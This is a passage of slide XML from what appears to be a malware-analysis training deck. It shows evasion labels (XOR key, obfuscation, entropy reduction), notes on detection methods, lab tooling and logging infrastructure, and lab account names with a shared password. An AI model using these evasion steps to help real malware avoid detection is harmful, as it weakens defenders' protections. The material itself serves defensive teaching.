              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85D95BFB-FB5A-B82F-7948-C8D2ABC47036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9908373" y="3351282"/>
            <a:ext cx="1156086" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>EMBEDDED XOR KEY</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAFFB060-5B04-E255-53DF-3D9F648C2ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9908373" y="2365824"/>
            <a:ext cx="1156086" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>OBFUSCATE CODE</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871B034A-8A89-9B31-1D7D-16AAAE90E4D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9908373" y="2660032"/>
            <a:ext cx="1156086" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>REDUCE ENTROPY</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7462654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5939CE-6BD8-476C-B666-B7DC57582D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>STATIC / HEURISTICS / BEHAVIOUR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A23F5B1A-2370-895E-1B50-12912DC6BA5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Static : Strings, signatures, hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>HEURISTIC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Static :  Entropy, API Calls, Unpacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>dissassembly code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Dynamic : Sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>BEHAVIOR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Running application on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>onitor (i.e. hooking functions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Suspicious -&gt; Memory scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29976196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F969-7703-B86E-6610-CFEBDD6E0445}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1D8ABBB-41CB-950B-92C6-57AFA2AF480E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="4373880" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>:\ THEV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>abs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>ysinternals tools (strings, sigcheck,sysmon, procexpl, procmon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>C:\wiki</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>dbook.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>3 users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>hreatadmin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>tudent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>tudent_adm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>w = Threathunt25</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{706F495C-3B59-8E5B-CB49-CB27FBE28BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6605016" y="1825625"/>
            <a:ext cx="437388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WINDOWS TOOLING</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DIE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Litterbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Python3.13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Git</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Visual Studio 2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Visual Studio Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PEStudio, PeBear, CFF Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2284077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A8C098-234F-E862-0CBF-2DB0D188DFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="781049" y="4337737"/>
            <a:ext cx="1930149" cy="1858662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A488065-A101-01D1-8165-1BFE8A4ED836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834736" y="4039286"/>
            <a:ext cx="3326808" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Student machines (per student)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416DBF50-9F54-052E-4AFA-9FAD408A0498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6848216" y="4337737"/>
            <a:ext cx="1950823" cy="1881855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0878B0AB-8BEA-A426-FB2D-074272E9004D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7384912" y="4087165"/>
            <a:ext cx="804131" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>INFRA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2E0F688-A41C-AACF-50A2-E3B821BCC1F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2398423" y="4313023"/>
            <a:ext cx="1839944" cy="1908090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C6DDB3-E73A-8421-1ACC-9DAEFE4CFD81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4638416" y="1329724"/>
            <a:ext cx="2209800" cy="2247900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C07D1C92-FB47-6E11-3E6B-F079F9621288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5299866" y="1145057"/>
            <a:ext cx="804131" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>INFRA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF3794E-6A63-159C-99BC-12B9E87C9E34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722075" y="1530344"/>
            <a:ext cx="3978876" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Traefik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Guacamole (RDP)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Portainer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Elastic + Kibana (Central data lake for all windows logs incl. DC)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F329D59B-2669-EDF0-6C6B-D30CE57D177A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8711514" y="3392958"/>
            <a:ext cx="3978876" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Winlogbeat (SYSMON)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F270763F-67C3-B010-A5FA-E0F05DF1A7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969495" y="6061161"/>
            <a:ext cx="2182695" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>Winlogbeat (SYSMON)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>Filebeat (ETW)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>RDP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Elbow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B40E0DB-93B6-EB0B-8D1F-E9BCE0610FF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="0"/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2250239" y="1949560"/>
            <a:ext cx="1884063" cy="2892292"/>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Elbow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{821EF6D2-C3F1-CB41-4383-77A6E41429A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5743316" y="3577625"/>
            <a:ext cx="1104900" cy="1701041"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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38D6F2B-51C9-BB3C-1D49-48C5F3DD55E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213495" y="2090406"/>
            <a:ext cx="2209800" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>Sysmon + ETW Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA67AB1B-6143-B9FB-73DC-5674900C0CE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4587205" y="3979443"/>
            <a:ext cx="2209800" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>Sysmon + Event Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83CE3F7D-2AC4-B7AF-55AC-E41448ABDE28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4040659" y="2818714"/>
            <a:ext cx="1147559" cy="2099275"/>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27" name="Straight Arrow Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04EC6D57-CDA8-75DA-2101-9D989C982CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2010730" y="2818713"/>
            <a:ext cx="3163171" cy="1792762"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E88AF05-A45B-F814-DF1E-B7B2E599CE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188218" y="2844454"/>
            <a:ext cx="2015612" cy="1636816"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9487998-EEC3-B62E-E97F-5D2A5E4B5B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828515" y="3378828"/>
